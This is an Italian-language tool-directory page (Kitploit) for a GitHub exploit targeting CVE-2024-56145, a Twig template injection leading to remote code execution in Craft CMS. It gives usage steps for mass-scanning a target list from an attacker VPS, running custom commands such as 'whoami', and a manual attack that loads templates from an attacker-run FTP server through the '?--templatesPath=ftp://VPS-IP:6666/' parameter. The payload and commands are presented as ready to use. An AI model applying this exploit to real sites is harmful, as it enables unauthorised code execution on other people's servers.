Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-56145-craftcms-rce — CVE-2024-56145 SSTI verso RCE - template Twig | Kitploit
Strumenti/GitHubGitHub/sachinart/cve-2024-56145-craftcms-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubsachinart/cve-2024-56145-craftcms-rce

CVE-2024-56145-craftcms-rce

CVE-2024-56145 SSTI verso RCE - template Twig

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
431 anno faNon ancora revisionato
Condividi

Prima di eseguire di nuovo lo script, esegui

fuser -k 6666/tcp

Utilizzo -

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

Si può usare un comando personalizzato come python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i è il tuo IP o l'IP del tuo VPS (ottienilo con ipconfig / ifconfig).

Esempio - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

Exploit manuale, esegui il poc.py sopra contro i target che hai, vedrai un file di output con i target vulnerabili

E ora? Hai un target vulnerabile ma vuoi giocare ancora? Ho aggiunto poc2.py per il test manuale contro il target. Come si fa? esegui fuser -k 6666/tcp

root@kitploit:~
1. Esegui poc2.py (la porta 6666 si avvia come FTP).
2. Apri il browser all'indirizzo yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. Vedrai -

image

Scritto da Chirag Artani (https://x.com/Chirag99Artani)

Scarica lo strumento